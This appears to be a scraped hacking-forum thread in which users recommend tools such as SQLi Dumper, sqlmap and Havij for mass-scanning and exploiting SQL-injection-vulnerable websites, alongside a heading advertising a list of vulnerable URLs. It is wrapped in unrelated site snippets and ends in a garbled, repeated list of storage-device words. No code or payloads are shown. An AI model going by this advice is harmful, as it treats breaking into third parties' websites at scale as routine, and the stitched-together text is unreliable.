www.americanconsumernews.net

Google

Search the world's information, including webpages, images, videos and more. Google has many special features to help you find exactly what you're looking for.

www.feedsort.com

edie · 05.07.2020

Peter сказал(а):

@indounderground SQLmap?

SQL map great for inject vulnerable sites but not good for mass scanning. venom or sqli dumper is good for scanning too.

EuroStar · 05.07.2020

time for sum sqldumper. i hope it still works.

edie · 05.07.2020

EuroStar сказал(а):

time for sum sqldumper. i hope it still works.

If your sqldumper not working is only from false setup or your firewall blocking. Guys SQLI dumper is the most simple and compact software for scanning and exploiting sqli vulnerable sites. Its no need any special knowledge.

Ahmadz · 08.07.2020

Do you have any other tool than SQLi Dumper?

joejoe123 · 13.07.2020

indounderground сказал(а):

What people use these days to find sqli, I am not too updated in web vulnerability things

SQLMAP https://github.com/sqlmapproject/sqlmap
Theres nothing better.

ahmed4lulz · 14.07.2020

You must have at least 1 reaction(s) to view the content.

Okay ?

Ahmadz · 14.07.2020

[QUOTE = "joejoe123, post: 242656, member: 201163"]
SQLMAP https://github.com/sqlmapproject/sqlmap
Theres nothing better.
[/ QUOTE]
Did you ever use Havij?

New Vulnerable URL-LIST -{SQL-Inj}-{XSS/LFI/RFI}-

RAID-массив

RAID-массив

HDD-drive

floppy-диск

CD-диск

RAID-массив

floppy-диск

HDD-drive

CD-диск

floppy-диск

floppy-диск

RAM

RAID-массив

RAID-массив

HDD-drive

RAID-массив

floppy-диск

floppy-диск

floppy-диск

floppy-диск